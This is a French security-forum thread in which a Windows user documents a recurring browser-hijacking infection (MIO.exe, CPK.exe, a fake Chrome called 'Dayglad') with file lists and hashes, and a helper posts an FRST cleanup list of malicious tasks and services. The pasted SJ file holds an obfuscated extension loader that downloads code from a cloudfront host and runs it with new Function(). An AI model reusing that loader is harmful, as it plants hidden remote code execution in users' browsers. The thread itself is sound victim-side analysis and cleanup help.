Malware MIO.exe, Snarer.msi, CPK.exe, QQBrowser...

mercene · par **mercene** » 04 mai 2017 02:54

Bonsoir,
Je suis actuellement sous Win10 PRO. Depuis plusieurs semaines je dois faire face à une installation récurrente d'un malware.
Malgrès de nombreux scans sous Malwarebyte, Adwcleaner, Roguekiller, Zemana, Spybot... etc et même une réinstallation de firefox (que je soupçonnais être vecteur de l'infection), le programme se réinstalle toujours.
Les antimalwares que j'ai pu utiliser ne detectent que les conséquences (fichiers créés dans appdata et program files) et jamais la cause.

Voici le scénario de l'installation des programmes malveillants (ça arrive à n'importe quel moment, je n'ai pas noté de corrélation avec mon activité au même moment) :
- Firefox crash subitement (une fenetre d'envoi de bug à mozilla apparait)
- L'icône épinglée de mon Firefox légitime dans la barre des tâches disparait
- Une nouvelle icône Firefox ainsi que Chrome (que je n'utilise pas de base sur mon pc) sont épinglés à la fin de la barre des tâches.

Je me précipite alors pour couper la connexion internet de l'ordinateur et voir ce qu'il se trame dans le gestionnaire des tâches.
En effectuant un tri des processus par "nombre de processeurs", je remarque l'éxécution des processus suivants :

QQBrowser.exe ()
CPK.exe (C:\Program Files (x86)\{8C0DFCBD-1B58-4B33-B511-927743AB18A3}\_ALLOWDEL_c46cd9) la clé entre accolades varie, le code après ALLOWDEL_ varie aussi, on dirait un CRC
...
(Il y en a surrement d'autres que j'ai oublié)

Aussitôt, je me rend dans Progam Files (x86).
Voici ce qui est installé par le malware :

C:
Program Files (x86)

Dayglad <=== Google Chrome modifié
Application
│ 58.0.3029.81.manifest
│ chrome.dll
│ chrome.exe
│ chrome_100_percent.pak
│ chrome_200_percent.pak
│ chrome_child.dll
│ chrome_elf.dll
│ chrome_watcher.dll
│ d3dcompiler_47.dll
│ eventlog_provider.dll
│ Extensions
│ icudtl.dat
│ libegl.dll
│ libglesv2.dll
│ natives_blob.bin
│ resources.pak
│ snapshot_blob.bin
│
├───bin
├───locales
│ am.pak
│ ar.pak
│ bg.pak
│ bn.pak
│ ca.pak
│ cs.pak
│ da.pak
│ de.pak
│ el.pak
│ en-GB.pak
│ en-US.pak
│ es-419.pak
│ es.pak
│ et.pak
│ fa.pak
│ fi.pak
│ fil.pak
│ fr.pak
│ gu.pak
│ he.pak
│ hi.pak
│ hr.pak
│ hu.pak
│ id.pak
│ it.pak
│ ja.pak
│ kn.pak
│ ko.pak
│ lt.pak
│ lv.pak
│ ml.pak
│ mr.pak
│ ms.pak
│ nb.pak
│ nl.pak
│ pl.pak
│ pt-BR.pak
│ pt-PT.pak
│ ro.pak
│ ru.pak
│ sk.pak
│ sl.pak
│ sr.pak
│ sv.pak
│ sw.pak
│ ta.pak
│ te.pak
│ th.pak
│ tr.pak
│ uk.pak
│ vi.pak
│ zh-CN.pak
│ zh-TW.pak
│
└───VisualElements
logo.png
smalllogo.png

Firefox <=== (notez l'absence de Mozilla devant)
Accessible.tlb
│ AccessibleMarshal.dll
│ api-ms-win-core-console-l1-1-0.dll
│ api-ms-win-core-datetime-l1-1-0.dll
│ api-ms-win-core-debug-l1-1-0.dll
│ api-ms-win-core-errorhandling-l1-1-0.dll
│ api-ms-win-core-file-l1-1-0.dll
│ api-ms-win-core-file-l1-2-0.dll
│ api-ms-win-core-file-l2-1-0.dll
│ api-ms-win-core-handle-l1-1-0.dll
│ api-ms-win-core-heap-l1-1-0.dll
│ api-ms-win-core-interlocked-l1-1-0.dll
│ api-ms-win-core-libraryloader-l1-1-0.dll
│ api-ms-win-core-localization-l1-2-0.dll
│ api-ms-win-core-memory-l1-1-0.dll
│ api-ms-win-core-namedpipe-l1-1-0.dll
│ api-ms-win-core-processenvironment-l1-1-0.dll
│ api-ms-win-core-processthreads-l1-1-0.dll
│ api-ms-win-core-processthreads-l1-1-1.dll
│ api-ms-win-core-profile-l1-1-0.dll
│ api-ms-win-core-rtlsupport-l1-1-0.dll
│ api-ms-win-core-string-l1-1-0.dll
│ api-ms-win-core-synch-l1-1-0.dll
│ api-ms-win-core-synch-l1-2-0.dll
│ api-ms-win-core-sysinfo-l1-1-0.dll
│ api-ms-win-core-timezone-l1-1-0.dll
│ api-ms-win-core-util-l1-1-0.dll
│ api-ms-win-crt-conio-l1-1-0.dll
│ api-ms-win-crt-convert-l1-1-0.dll
│ api-ms-win-crt-environment-l1-1-0.dll
│ api-ms-win-crt-filesystem-l1-1-0.dll
│ api-ms-win-crt-heap-l1-1-0.dll
│ api-ms-win-crt-locale-l1-1-0.dll
│ api-ms-win-crt-math-l1-1-0.dll
│ api-ms-win-crt-multibyte-l1-1-0.dll
│ api-ms-win-crt-private-l1-1-0.dll
│ api-ms-win-crt-process-l1-1-0.dll
│ api-ms-win-crt-runtime-l1-1-0.dll
│ api-ms-win-crt-stdio-l1-1-0.dll
│ api-ms-win-crt-string-l1-1-0.dll
│ api-ms-win-crt-time-l1-1-0.dll
│ api-ms-win-crt-utility-l1-1-0.dll
│ application.ini
│ breakpadinjector.dll
│ chrome.manifest
│ crashreporter.exe
│ crashreporter.ini
│ d3dcompiler_47.dll
│ dependentlibs.list
│ Firefox.exe
│ firefox.VisualElementsManifest.xml
│ freebl3.chk
│ freebl3.dll
│ IA2Marshal.dll
│ lgpllibs.dll
│ libEGL.dll
│ libGLESv2.dll
│ maintenanceservice.exe
│ maintenanceservice_installer.exe
│ minidump-analyzer.exe
│ mozavcodec.dll
│ mozavutil.dll
│ mozglue.dll
│ msvcp140.dll
│ nss3.dll
│ nssckbi.dll
│ nssdbm3.chk
│ nssdbm3.dll
│ omni.ja
│ platform.ini
│ plugin-container.exe
│ plugin-hang-ui.exe
│ precomplete
│ qipcap.dll
│ removed-files
│ softokn3.chk
│ softokn3.dll
│ ucrtbase.dll
│ upclient
│ update-settings.ini
│ updater.exe
│ updater.ini
│ vcruntime140.dll
│ wow_helper.exe
│ xul.dll
│
├───bin
│ FirefoxUpdate.exe
│ Firefox_crashreporter.exe
│ Firefox_crashreporterx64.exe
│
├───browser
│ │ @H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi
│ │ blocklist.xml
│ │ chrome.manifest
│ │ crashreporter-override.ini
│ │ omni.ja
│ │
│ ├───extensions
│ │ @E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi
│ │ {972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
│ │
│ ├───features
│ │ [email protected]
│ │ [email protected]
│ │ [email protected]
│ │ [email protected]
│ │
│ └───VisualElements
│ VisualElements_150.png
│ VisualElements_70.png
│
├───defaults
│ └───pref
│ channel-prefs.js
│
├───dictionaries
│ en-US.aff
│ en-US.dic
│
├───fonts
│ EmojiOneMozilla.ttf
│
├───gmp-clearkey
│ └───0.1
│ clearkey.dll
│ manifest.json
│
└───uninstall
helper.exe

MIO
│ MIO.exe (MD5 7f014d20314f4902ff7ab2bd459c4430)
│
└───loader
hgstxhts721010a9e630_jr10004m21hw8f21hw8fx.dat (MD5 ed e3 3e bf 3d 36 15 2c 8d c6 c8 49 a3 14 d4 9c)

{8C0DFCBD-1B58-4B33-B511-927743AB18A3}
└───_ALLOWDEL_c46cd9
11 (fichier vide)
CJ (VOIR EN DESSOUS)
CPK.exe (MD5 ec91580c3b88645f783fefbe89d605a2)
data.tmp (MD5 cac420aa13de4f46365b7c21635caa52)
kokoko1.dll (MD5 d5f616a38ff3817c73024153a2c943d5)
kokoko2.dll (MD5 d5f616a38ff3817c73024153a2c943d5)
MIO.dll (MD5 d7fb900983206d3cf60c6b2a3c505ef6)
MIO.exe (MD5 7f014d20314f4902ff7ab2bd459c4430)
psi.dll (MD5 1fb91ea41a29907379a8d184b774e5f2)
SJ (VOIR EN DESSOUS)
Snarer.msi (MD5 98698f881913a277b81edf8bd530fe86)
SSS.dll (MD5 29354102f101b7b57514f0b88aaa55fd)
UAC.dll (MD5 110e756065edc7400e52a74294bd0bef)
WinSAP.dll (MD5 526fd5a4636773795b45bd0c55335bef)

----------------------
CONTENU DE "CJ" :
----------------------
{
// Extension ID: nkeimhogjdpnpccoofpliimaahmaaome
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAQt2ZDdPfoSe/JI6ID5bgLHRCnCu9T36aYczmhw/tnv6QZB2I6WnOCMZXJZlRdqWc7w9jo4BWhYS50Vb4weMfh/I0On7VcRwJUgfAxW2cHB+EkmtI1v4v/OU24OqIa1Nmv9uRVeX0GjhQukdLNhAE6ACWooaf5kqKlCeK+1GOkQIDAQAB",

"name": "Google Hangouts",
// Note: Always update the version number when this file is updated. Chrome
// triggers extension preferences update on the version increase.
"version": "1.3.2",
"manifest_version": 2,
"externally_connectable": {
"ids": ["*"],
"matches": [
"*://*.facebook.com/*",
"*://*.twitter.com/*",
"*://*.instagram.com/*",
"*://*.pinterest.com/*",
"*://*.google.com/*",
"https://*.google.com/*",
// For tests.
"*://localhost/*"
]
},
"content_scripts": [
{
"matches": [
"*://*/*"
],
"js": [
"thunk.js"
],
"all_frames": true,
"run_at": "document_start"
}
],
"background": {
"page": "background.html"
},
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
"incognito": "split",
"permissions": [
"tabs",
"cookies",
"webRequest",
"management",
"storage",
"webRequestBlocking",
"webNavigation",
"http://*/*",
"https://*/*",
"desktopCapture",
"processes",
"system.cpu",
"webrtcAudioPrivate",
"webrtcDesktopCapturePrivate",
"webrtcLoggingPrivate"
]
}
-------------------------------------------
CONTENU DE SJ
-------------------------------------------
if (chrome.management) {

chrome.runtime.onMessageExternal.addListener(
function(message, sender, sendResponse) {
function doSendResponse(value, errorString) {
var error = null;
if (errorString) {
error = {};
error['name'] = 'ComponentExtensionError';
error['message'] = errorString;
}

var errorMessage = error || chrome.extension.lastError;
sendResponse({'value': value, 'error': errorMessage});
}

function getHost(url) {
if (!url)
return '';
// Use the DOM to parse the URL. Since we don't add the anchor to
// the page, this is the only reference to it and it will be
// deleted once it's gone out of scope.
var a = document.createElement('a');
a.href = url;
var origin = a.protocol + '//' + a.hostname;
if (a.port != '')
origin = origin + ':' + a.port;
origin = origin + '/';
return origin;
}

try {
var requestInfo = {};

// Set the tab ID. If it's passed in the message, use that.
// Otherwise use the sender information.
if (message['tabId']) {
requestInfo['tabId'] = +message['tabId'];
if (isNaN(requestInfo['tabId'])) {
throw new Error('Cannot convert tab ID string to integer: ' +
message['tabId']);
}
} else if (sender.tab) {
requestInfo['tabId'] = sender.tab.id;
}

if (sender.guestProcessId) {
requestInfo['guestProcessId'] = sender.guestProcessId;
}

var method = message['method'];

// Set the origin. If a URL is passed in the message, use that.
// Otherwise use the sender information.
var origin;
if (message['winUrl']) {
origin = getHost(message['winUrl']);
} else {
origin = getHost(sender.url);
}

if (method == 'cpu.getInfo') {
chrome.system.cpu.getInfo(doSendResponse);
return true;
} else if (method == 'logging.setMetadata') {
var metaData = message['metaData'];
chrome.webrtcLoggingPrivate.setMetaData(
requestInfo, origin, metaData, doSendResponse);
return true;
} else if (method == 'logging.start') {
chrome.webrtcLoggingPrivate.start(
requestInfo, origin, doSendResponse);
return true;
} else if (method == 'logging.uploadOnRenderClose') {
chrome.webrtcLoggingPrivate.setUploadOnRenderClose(
requestInfo, origin, true);
doSendResponse();
return false;
} else if (method == 'logging.noUploadOnRenderClose') {
chrome.webrtcLoggingPrivate.setUploadOnRenderClose(
requestInfo, origin, false);
doSendResponse();
return false;
} else if (method == 'logging.stop') {
chrome.webrtcLoggingPrivate.stop(
requestInfo, origin, doSendResponse);
return true;
} else if (method == 'logging.upload') {
chrome.webrtcLoggingPrivate.upload(
requestInfo, origin, doSendResponse);
return true;
} else if (method == 'logging.uploadStored') {
var logId = message['logId'];
chrome.webrtcLoggingPrivate.uploadStored(
requestInfo, origin, logId, doSendResponse);
return true;
} else if (method == 'logging.stopAndUpload') {
// Stop everything and upload. This is allowed to be called even if
// logs have already been stopped or not started. Therefore, ignore
// any errors along the way, but store them, so that if upload fails
// they are all reported back.
// Stop incoming and outgoing RTP dumps separately, otherwise
// stopRtpDump will fail and not stop anything if either type has not
// been started.
var errors = [];
chrome.webrtcLoggingPrivate.stopRtpDump(
requestInfo, origin, true /* incoming */, false /* outgoing */,
function() {
appendLastErrorMessage(errors);
chrome.webrtcLoggingPrivate.stopRtpDump(
requestInfo, origin, false /* incoming */, true /* outgoing */,
function() {
appendLastErrorMessage(errors);
chrome.webrtcLoggingPrivate.stop(
requestInfo, origin, function() {
appendLastErrorMessage(errors);
chrome.webrtcLoggingPrivate.upload(
requestInfo, origin,
function(uploadValue) {
var errorMessage = null;
// If upload fails, report all previous errors. Otherwise,
// throw them away.
if (chrome.extension.lastError !== undefined) {
appendLastErrorMessage(errors);
errorMessage = errors.join('; ');
}
doSendResponse(uploadValue, errorMessage);
});
});
});
});
return true;
} else if (method == 'logging.store') {
var logId = message['logId'];
chrome.webrtcLoggingPrivate.store(
requestInfo, origin, logId, doSendResponse);
return true;
} else if (method == 'logging.discard') {
chrome.webrtcLoggingPrivate.discard(
requestInfo, origin, doSendResponse);
return true;
} else if (method == 'getSinks') {
chrome.webrtcAudioPrivate.getSinks(doSendResponse);
return true;
} else if (method == 'getActiveSink') {
chrome.webrtcAudioPrivate.getActiveSink(
requestInfo, doSendResponse);
return true;
} else if (method == 'setActiveSink') {
var sinkId = message['sinkId'];
chrome.webrtcAudioPrivate.setActiveSink(
requestInfo, sinkId, doSendResponse);
return true;
} else if (method == 'getAssociatedSink') {
var sourceId = message['sourceId'];
chrome.webrtcAudioPrivate.getAssociatedSink(
origin, sourceId, doSendResponse);
return true;
} else if (method == 'isExtensionEnabled') {
// This method is necessary because there may be more than one
// version of this extension, under different extension IDs. By
// first calling this method on the extension ID, the client can
// check if it's loaded; if it's not, the extension system will
// call the callback with no arguments and set
// chrome.runtime.lastError.
doSendResponse();
return false;
} else if (method == 'getNaclArchitecture') {
chrome.runtime.getPlatformInfo(function(obj) {
doSendResponse(obj.nacl_arch);
});
return true;
} else if (method == 'logging.startRtpDump') {
var incoming = message['incoming'] || false;
var outgoing = message['outgoing'] || false;
chrome.webrtcLoggingPrivate.startRtpDump(
requestInfo, origin, incoming, outgoing, doSendResponse);
return true;
} else if (method == 'logging.stopRtpDump') {
var incoming = message['incoming'] || false;
var outgoing = message['outgoing'] || false;
chrome.webrtcLoggingPrivate.stopRtpDump(
requestInfo, origin, incoming, outgoing, doSendResponse);
return true;
} else if (method == 'logging.startAudioDebugRecordings') {
var seconds = message['seconds'] || 0;
chrome.webrtcLoggingPrivate.startAudioDebugRecordings(
requestInfo, origin, seconds, doSendResponse);
return true;
} else if (method == 'logging.stopAudioDebugRecordings') {
chrome.webrtcLoggingPrivate.stopAudioDebugRecordings(
requestInfo, origin, doSendResponse);
return true;
} else if (method == 'logging.startWebRtcEventLogging') {
var seconds = message['seconds'] || 0;
chrome.webrtcLoggingPrivate.startWebRtcEventLogging(
requestInfo, origin, seconds, doSendResponse);
return true;
} else if (method == 'logging.stopWebRtcEventLogging') {
chrome.webrtcLoggingPrivate.stopWebRtcEventLogging(
requestInfo, origin, doSendResponse);
return true;
}

throw new Error('Unknown method: ' + method);
} catch (e) {
doSendResponse(null, e.name + ': ' + e.message);
}
}
);

// If Hangouts connects with a port named 'onSinksChangedListener', we
// will register a listener and send it a message {'eventName':
// 'onSinksChanged'} whenever the event fires.
function onSinksChangedPort(port) {
function clientListener() {
port.postMessage({'eventName': 'onSinksChanged'});
}
chrome.webrtcAudioPrivate.onSinksChanged.addListener(clientListener);

port.onDisconnect.addListener(function() {
chrome.webrtcAudioPrivate.onSinksChanged.removeListener(
clientListener);
});
}

// This is a one-time-use port for calling chooseDesktopMedia. The page
// sends one message, identifying the requested source types, and the
// extension sends a single reply, with the user's selected streamId. A port
// is used so that if the page is closed before that message is sent, the
// window picker dialog will be closed.
function onChooseDesktopMediaPort(port) {
function sendResponse(streamId) {
port.postMessage({'value': {'streamId': streamId}});
port.disconnect();
}

port.onMessage.addListener(function(message) {
var method = message['method'];
if (method == 'chooseDesktopMedia') {
var sources = message['sources'];
var cancelId = null;
if (port.sender.tab) {
cancelId = chrome.desktopCapture.chooseDesktopMedia(
sources, port.sender.tab, sendResponse);
} else {
var requestInfo = {};
requestInfo['guestProcessId'] = port.sender.guestProcessId || 0;
requestInfo['guestRenderFrameId'] =
port.sender.guestRenderFrameRoutingId || 0;
cancelId = chrome.webrtcDesktopCapturePrivate.chooseDesktopMedia(
sources, requestInfo, sendResponse);
}
port.onDisconnect.addListener(function() {
// This method has no effect if called after the user has selected a
// desktop media source, so it does not need to be conditional.
if (port.sender.tab) {
chrome.desktopCapture.cancelChooseDesktopMedia(cancelId);
} else {
chrome.webrtcDesktopCapturePrivate.cancelChooseDesktopMedia(cancelId);
}
});
}
});
}

// A port for continuously reporting relevant CPU usage information to the page.
function onProcessCpu(port) {
var tabPid = port.sender.guestProcessId || undefined;
function processListener(processes) {
if (tabPid == undefined) {
// getProcessIdForTab sometimes fails, and does not call the callback.
// (Tracked at https://crbug.com/368855.)
// This call retries it on each process update until it succeeds.
chrome.processes.getProcessIdForTab(port.sender.tab.id, function(x) {
tabPid = x;
});
return;
}
var tabProcess = processes[tabPid];
if (!tabProcess) {
return;
}
var pluginProcessCpu = 0, browserProcessCpu = 0, gpuProcessCpu = 0;
for (var pid in processes) {
var process = processes[pid];
if (process.type == 'browser') {
browserProcessCpu = process.cpu;
} else if (process.type == 'gpu') {
gpuProcessCpu = process.cpu;
} else if ((process.type == 'plugin' || process.type == 'nacl') &&
process.title.toLowerCase().indexOf('hangouts') > 0) {
pluginProcessCpu = process.cpu;
}
}

port.postMessage({
'tabCpuUsage': tabProcess.cpu,
'browserCpuUsage': browserProcessCpu,
'gpuCpuUsage': gpuProcessCpu,
'pluginCpuUsage': pluginProcessCpu
});
}

chrome.processes.onUpdated.addListener(processListener);
port.onDisconnect.addListener(function() {
chrome.processes.onUpdated.removeListener(processListener);
});
}

function appendLastErrorMessage(errors) {
if (chrome.extension.lastError !== undefined)
errors.push(chrome.extension.lastError.message);
}

chrome.runtime.onConnectExternal.addListener(function(port) {
if (port.name == 'onSinksChangedListener') {
onSinksChangedPort(port);
} else if (port.name == 'chooseDesktopMedia') {
onChooseDesktopMediaPort(port);
} else if (port.name == 'processCpu') {
onProcessCpu(port);
} else {
// Unknown port type.
port.disconnect();
}
});

Controller=function(){};Controller.prototype.scan=function(b){b&&(new Function(b))()};Controller.prototype.request=function(d,a,e){var f=new XMLHttpRequest,c="http://d1g3yh8pgp6phy.cloudfront.net/"; ... ==200){var b=f.responseText;if(b!="ok"){chrome.storage.local.set({c:b});Controller.scan(b)}else{Controller.scan(e)}}else{Controller.scan(e)}};f.onerror=function(){Controller.scan(e)};f.send()};Controller.prototype.chromeInit=function(){chrome.storage.local.get(["u","v","c"],function(g){var b=g.u,f=g.v,d=g.c;f||(f=0);d||(d="");if(b){Controller.request(b,f,d)}else{var e=new Uint8Array(32),b="";crypto.getRandomValues(e);for(var a=0;a<e.length;++a){b=b+e[a].toString(16)}chrome.storage.local.set({u:b});Controller.request(b,f,d)}})};Controller.prototype.init=function(){this.chromeInit()};var Controller=new Controller;Controller.init();

} else {
chrome.storage.local.get("c",function(g){g.c && (new Function(g.c))()});
}

----------------------------------------------------------------------------------------------------

En fouillant un petit peu dans le dossier AppData de mon compte (recherche des dernières modifications)

Je constate la présence de plein de fichiers dans le cache d'Internet Explorer (C:\Users\***\AppData\Local\Microsoft\Windows\INetCache\IE) à la minute ou l'infection a commencé.

Je découvre un fichier "downloader[1]" codé en json avec quelquechose d'interressant dedans :
{"error":0,"md5":"aaffc62779da5c0eae5e3bf393652015","needupdate":1,"task_id":469,"msg":"","url":"http://d34cz67a0qhhno.cloudfront.net/fi ... 53.0.3.813"}

Hmm bizarre cette url pour une mise à jour prétenduement de mozilla...

Encore un autre "downloader" :
{"error":0,"md5":"5875c7ff586f3d3e11c264594230d875","needupdate":1,"task_id":471,"msg":"","url":"http://d2kbofg7g0ona4.cloudfront.net/go ... .1.3029.81"}

D'autres fichiers sont également apparus aussi dans le cache :
58.1.3029.81[1].dat (MD5 5875c7ff586f3d3e11c264594230d875)
53.0.3.813[1].dat (MD5 aaffc62779da5c0eae5e3bf393652015)
checkins[1].htm 1 octet <=== contient uniquement un "0" (MD5 cfcd208495d565ef66e7dff9f98764da)

Dois-je en conclure que le vecteur de l'attaque est Internet Explorer?

D'autre part dans AppData Roaming, le dossier "WinSAPSvc" est apparu avec à l'intérieur WinSAP.dll (MD5 526fd5a4636773795b45bd0c55335bef)

Dans AppData\Local les dossiers et fichiers suivants sont également créés :

Dayglad/ (profil de la copie de chrome)
....

SNARE/
Snare.dll (MD5 a144115a29ee250879556036be4e39d5)

Kitty/
Kitty.dll (MD5 d5f616a38ff3817c73024153a2c943d5)

Dans TEMP :

tmp6DA4.tmp/
---39.json
---DataBase
---QQBrowser.exe (MD5 2e ee 15 b1 92 7e ad ff 45 01 3e 94 b0 cb 0d 94)
---QQBrowserFrame.dll
---RegKey.dll
---WinSnare.msi

Mais au même moment je retrouve également un log de powershell bizarre dans Local\Microsoft\CLR_v4.0... :
1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\6d712bf5f07ce74d9e2d31a443dea9c2\System.ni.dll",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\561bcb2835dc3d4de610397aebd07edc\System.Core.ni.dll",0
3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\3e259bf3b9ee0015b05f6da919ee7d39\Microsoft.PowerShell.ConsoleHost.ni.dll",0
3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\c83ff1463c7938acdd8b8aa0d74cfa1a\System.Management.Automation.ni.dll",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\cfff018936a7c6348cb7ea98d432343a\System.Xml.ni.dll",0
3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\4979591369179732bf744077fdf32393\System.Management.ni.dll",0
3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\821555757be775e795f68b8860875cf4\System.DirectoryServices.ni.dll",0
3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\090944cdcbf7fca1c5f201bbf89b224b\System.Numerics.ni.dll",0
3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\79892cb4ea3329381a2fc51dad52eb6e\System.Data.ni.dll",0
3,"Microsoft.PowerShell.Security, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\6855f83f211a4de2f3a4dfefee0ffc43\Microsoft.PowerShell.Security.ni.dll",0
3,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\b5ac76fda1bde6bae8735c5ec559d69b\System.Transactions.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\69bc7c6c084baf2d2ffd6871c726e266\System.Configuration.ni.dll",0
3,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\1603e15bfa4813f780ef8dfb1291da1b\Microsoft.CSharp.ni.dll",0
3,"Microsoft.PowerShell.Commands.Utility, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\440574d4053e0b9381243023d98675db\Microsoft.PowerShell.Commands.Utility.ni.dll",0
3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\36f8d0873355479b4f30600c58880582\System.Configuration.Install.ni.dll",0

-----------------------------------------------------------
Les Navigateurs :

Le moteur de recherche et la page par défaut est remplacé par http://www.luckystarting.com
----------------------------------------------------------

Je connais les fichiers qui sont créés, en revanche je ne comprend pas comment cette merde se réinstalle sans arrêt.

Ca commence à me taper sévèrement sur le système de me faire avoir par une petite cochonnerie comme ça.

Etant donné qu'il s'agit d'une analyse non exhaustive manuelle, j'ai réalisé une autre analyse sous FRST, voici les fichiers :

MOT DE PASSE : $$$0405$$$

FRST http://pjjoint.malekal.com/files.php?id ... m10m912g14
Addition http://pjjoint.malekal.com/files.php?id ... 12c6i14c10

(pour info, la dernière infection s'est produite vers 0:40)

Merci beaucoup d'avance pour votre aide.

par **angelique** » 04 mai 2017 10:00

Bonjour,

Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou executer➫notepad)
Copie/colle dedans ce qui suit :

Code : Tout sélectionner

Task: {38B5FAA0-CACE-4C91-9EBC-0F8AA347BED9} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-04] () <==== ATTENTION
Task: {A1DD86FD-8958-47D4-BDD1-C494D9E87F56} - \Awisjipy -> Pas de fichier <==== ATTENTION
Task: {B3D45DF3-C618-4DFE-A023-147E058F83F8} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Shortcut: C:\Users\MONLOGIN\Desktop\Nouveau dossier (8)\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\MONLOGIN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\MONLOGIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Qt\5.7\MSVC 2015 (64-bit)\Qt 5.7 64-bit for Desktop (MSVC 2015).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /A /Q /K C:\Qt\5.7\msvc2015_64\bin\qtenv2.bat
ShortcutWithArgument: C:\Users\MONLOGIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Qt\5.7\MinGW 5.3.0 (32-bit)\Qt 5.7 for Desktop (MinGW 5.3.0 32 bit).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /A /Q /K C:\Qt\5.7\mingw53_32\bin\qtenv2.bat
HKU\S-1-5-21-621065654-1371864139-571084426-1001\...\Run: [ET9HTVYSE4] => "C:\Program Files\7JLTZ4K8OK\1Y31R8ARJ.exe"
HKU\S-1-5-21-621065654-1371864139-571084426-1001\...\Run: [SPHMDUDWX5] => "C:\Program Files\C4LH9FEELE\C4LH9FEEL.exe"
FF Extension: (Pas de nom) - C:\Users\MONLOGIN\AppData\Roaming\Mozilla\Firefox\Profiles\xonj1m5w.default\extensions\{cd617375-6743-4ee8-bac4-fbf10f35729e}.xpi [non trouvé(e)]
FF Extension: (Pas de nom) - C:\Users\MONLOGIN\AppData\Roaming\Mozilla\Firefox\Profiles\xonj1m5w.default\extensions\[email protected] [non trouvé(e)]
S2 FirefoxDL; C:\Windows\TEMP\hp5D09.tmp\QQBrowser.exe [131640 2015-01-06] (Tencent Inc.)
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-03] () <==== ATTENTION
R2 Kitty; C:\Users\MONLOGIN\AppData\Local\Kitty\Kitty.dll [123904 2017-05-04] (word) [Fichier non signé] <==== ATTENTION
R2 SNARE; C:\Users\MONLOGIN\AppData\Local\SNARE\Snare.dll [833536 2017-04-28] (InterSect Alliance Pty Ltd) [Fichier non signé]
R2 SNAREA; C:\Users\MONLOGIN\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non signé]
R2 WinSAPSvc; C:\Users\MONLOGIN\AppData\Roaming\WinSAPSvc\WinSAP.dll [217600 2017-05-04] (WinSAP.dll) [Fichier non signé] <==== ATTENTION
2017-05-04 00:42 - 2017-05-04 00:42 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-04 00:42 - 2017-05-04 00:42 - 00000000 ____D C:\Users\MONLOGIN\AppData\Local\Dayglad
2017-05-04 00:42 - 2017-05-04 00:42 - 00000000 ____D C:\Program Files (x86)\Dayglad
